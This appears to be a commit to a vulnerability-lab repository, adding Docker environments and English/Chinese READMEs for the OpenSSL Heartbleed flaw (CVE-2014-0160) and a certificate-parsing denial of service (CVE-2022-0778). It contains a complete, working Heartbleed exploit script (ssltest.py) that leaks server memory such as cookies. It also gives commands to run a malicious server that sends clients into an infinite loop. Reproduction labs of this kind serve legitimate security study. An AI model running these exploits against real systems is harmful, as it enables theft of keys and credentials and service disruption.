first commit

openssl/CVE-2014-0160/README.md

@@ -0,0 +1,34 @@
+# OpenSSL Heartbleed Memory Leak Leads to Information Disclosure (CVE-2014-0160)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
+
+The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.
+
+References:
+
+- https://heartbleed.com/
+- https://filippo.io/Heartbleed
+
+## Setup
+
+Execute following command to start a Nginx server with OpenSSL 1.0.1c:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `https://your-ip:8443` to see the welcome page.
+
+> We have encountered an error when running this environment where some AMD architecture CPUs were unable to access the https page successfully. If you have a similar problem, try an Intel CPU instead.
+
+## POC
+
+Visit `https://filippo.io/Heartbleed` to check the result:
+
+![](1.png)
+
+Run [ssltest.py](ssltest.py) with Python to obtain sensitive data (such as Cookie):
+
+![](2.png)

openssl/CVE-2014-0160/README.zh-cn.md

@@ -0,0 +1,30 @@
+# OpenSSL 心脏出血内存泄露漏洞（CVE-2014-0160）
+
+心脏出血是OpenSSL库中的一个内存漏洞，攻击者利用这个漏洞可以服务到目标进程内存信息，如其他人的Cookie等敏感信息。
+
+参考链接：
+
+- https://heartbleed.com/
+- https://filippo.io/Heartbleed
+
+## 环境搭建
+
+运行如下命令启动一个使用了OpenSSL 1.0.1c的Nginx服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`https://your-ip:8443`即可查看到hello页面（需要忽略https错误）。
+
+> 我们在运行这个环境的时候遇到过一个错误，部分AMD架构的CPU无法成功访问https页面，如果你也遇到过类似的问题，可以换Intel CPU试试。
+
+## 漏洞复现
+
+访问<https://filippo.io/Heartbleed>进行在线检测：
+
+![](1.png)
+
+Python运行[ssltest.py](ssltest.py)，拿到敏感数据（Cookie）：
+
+![](2.png)

openssl/CVE-2014-0160/docker-compose.yml

@@ -0,0 +1,9 @@
+version: '2'
+services:
+ nginx:
+   image: vulhub/openssl:1.0.1c-with-nginx
+   volumes:
+    - ./www:/var/www/html
+   ports:
+    - "8080:80"
+    - "8443:443"

openssl/CVE-2014-0160/ssltest.py

@@ -0,0 +1,138 @@
+#!/usr/bin/python
+
+# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
+# The author disclaims copyright to this source code.
+
+import sys
+import struct
+import socket
+import time
+import select
+import binascii
+import re
+from optparse import OptionParser
+
+options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
+options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
+
+def h2bin(x):
+    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))
+
+hello = h2bin('''
+16 03 02 00 dc 01 00 00 d8 03 02 53
+43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
+bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
+00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
+00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
+c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
+c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
+c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
+c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
+00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
+03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
+00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
+00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
+00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
+00 0f 00 01 01                                  
+''')
+
+hb = h2bin(''' 
+18 03 02 00 03
+01 40 00
+''')
+
+def hexdump(s: bytes):
+    for b in range(0, len(s), 16):
+        lin = [c for c in s[b : b + 16]]
+        hxdat = ' '.join('%02X' % c for c in lin)
+        pdat = ''.join((chr(c) if 32 <= c <= 126 else '.' )for c in lin)
+        print('  %04x: %-48s %s' % (b, hxdat, pdat))
+    
+    print("")
+
+def recvall(s, length, timeout=5):
+    endtime = time.time() + timeout
+    rdata = b''
+    remain = length
+    while remain > 0:
+        rtime = endtime - time.time() 
+        if rtime < 0:
+            return None
+        r, w, e = select.select([s], [], [], 5)
+        if s in r:
+            data = s.recv(remain)
+            # EOF?
+            if not data:
+                return None
+            rdata += data
+            remain -= len(data)
+    return rdata
+        
+
+def recvmsg(s):
+    hdr = recvall(s, 5)
+    if hdr is None:
+        print('Unexpected EOF receiving record header - server closed connection')
+        return None, None, None
+    typ, ver, ln = struct.unpack('>BHH', hdr)
+    pay = recvall(s, ln, 10)
+    if pay is None:
+        print('Unexpected EOF receiving record payload - server closed connection')
+        return None, None, None
+    print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
+    return typ, ver, pay
+
+def hit_hb(s):
+    s.send(hb)
+    while True:
+        typ, ver, pay = recvmsg(s)
+        if typ is None:
+            print('No heartbeat response received, server likely not vulnerable')
+            return False
+
+        if typ == 24:
+            print('Received heartbeat response:')
+            hexdump(pay)
+            if len(pay) > 3:
+                print('WARNING: server returned more data than it should - server is vulnerable!')
+            else:
+                print('Server processed malformed heartbeat, but did not return any extra data.')
+            return True
+
+        if typ == 21:
+            print('Received alert:')
+            hexdump(pay)
+            print('Server returned error, likely not vulnerable')
+            return False
+
+def main():
+    opts, args = options.parse_args()
+    if len(args) < 1:
+        options.print_help()
+        return
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    print('Connecting...')
+    sys.stdout.flush()
+    s.connect((args[0], opts.port))
+    print('Sending Client Hello...')
+    sys.stdout.flush()
+    s.send(hello)
+    print('Waiting for Server Hello...')
+    sys.stdout.flush()
+    while True:
+        typ, ver, pay = recvmsg(s)
+        if typ == None:
+            print('Server closed connection without sending Server Hello.')
+            return
+        # Look for server hello done message.
+        if typ == 22 and pay[0] == 0x0E:
+            break
+
+    print('Sending heartbeat request...')
+    sys.stdout.flush()
+    s.send(hb)
+    hit_hb(s)
+
+if __name__ == '__main__':
+    main()

openssl/CVE-2014-0160/www/index.html

@@ -0,0 +1,9 @@
+<html>
+    <head>
+        <meta charset="utf-8">
+        <title>Heartbleed Test</title>
+    </head>
+    <body>
+        <p>Heartbleed Test</p>
+    </body>
+</html>

openssl/CVE-2022-0778/README.md

@@ -0,0 +1,49 @@
+# OpenSSL Infinite Loop Leads to DoS (CVE-2022-0778)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+OpenSSL is a software library for applications that secure communications over computer networks against eavesdropping or need to identify the party at the other end.
+
+A flaw was found in OpenSSL. It is possible to trigger an infinite loop by crafting a certificate that has invalid elliptic curve parameters. Since certificate parsing happens before verification of the certificate signature, any process that parses an externally supplied certificate may be subject to a denial of service attack.
+
+Reference links:
+
+- <https://github.com/drago-96/CVE-2022-0778>
+- <https://www.cnblogs.com/logchen/p/16030515.html>
+- <https://catbro666.github.io/posts/83951100/>
+- <https://github.com/yywing/cve-2022-0778>
+
+## Vulnerability environment
+
+Execute following command to start a server:
+
+```
+docker compose up -d
+```
+
+## Reproduce vulnerability
+
+Firstly, use [this project](https://github.com/vulhub/cve-2022-0778) to build and run an evil server. If you don't have the Golang compiler, just use the Docker image:
+
+```
+docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
+```
+
+Then you can monitor the CPU usage inside the container through `top`:
+
+```
+docker compose exec curl top
+```
+
+This vulnerability is available when parsing the certificate, so we can use the cURL to demonstrate it.
+
+Entry the environment, and use the cURL to browse the evil server that started before:
+
+```
+docker compose exec curl bash
+curl -k https://host.docker.internal:12345
+```
+
+At this point, cURL will be caught in an infinite loop, and CPU resources will be exhausted unexpectedly:
+
+![](1.png)

openssl/CVE-2022-0778/README.zh-cn.md

@@ -0,0 +1,45 @@
+# OpenSSL无限循环DOS漏洞（CVE-2022-0778）
+
+OpenSSL是一个开放源代码的软件库包，应用程序可以使用这个包来进行安全通信，避免窃听，同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。
+
+OpenSSL 1.1.1m 版本及以前存在一处逻辑缺陷，攻击者可以利用一个无效的椭圆曲线参数证书，触发一个无限循环导致耗尽目标CPU。由于证书解析发生在验证证书签名之前，任何解析外部提供的证书的进程都可能受到拒绝服务的攻击。
+
+参考链接：
+
+- <https://github.com/drago-96/CVE-2022-0778>
+- <https://www.cnblogs.com/logchen/p/16030515.html>
+- <https://catbro666.github.io/posts/83951100/>
+- <https://github.com/yywing/cve-2022-0778>
+
+## 漏洞环境
+
+执行如下命令启动一个server：
+
+```
+docker compose up -d
+```
+
+## 漏洞复现
+
+首先，使用[这个项目](https://github.com/vulhub/cve-2022-0778)中的代码编译并运行一个恶意服务器。如果你没有Golang相关编译环境，也可以直接使用如下Docker命令启动：
+
+```
+docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
+```
+
+然后，你可以在Vulhub环境中使用`top`命令来查看此时的CPU占用：
+
+```
+docker compose exec curl top
+```
+
+由于这个漏洞是发生在解析TLS证书时，所以我们可以使用cURL来复现这个漏洞。进入容器，并执行cURL命令访问前面启动的恶意服务器：
+
+```
+docker compose exec curl bash
+curl -k https://host.docker.internal:12345
+```
+
+此时，cURL会陷入死循环，查看`top`中的CPU占用即可发现已经100%：
+
+![](1.png)

openssl/CVE-2022-0778/docker-compose.yml

@@ -0,0 +1,5 @@
+version: '2'
+services:
+  curl:
+    image: vulhub/openssl:1.1.1m-with-curl
+    command: sleep infinity

openssl/heartbleed/README.md

@@ -0,0 +1 @@
+# This page moved to [CVE-2014-0160](../CVE-2014-0160)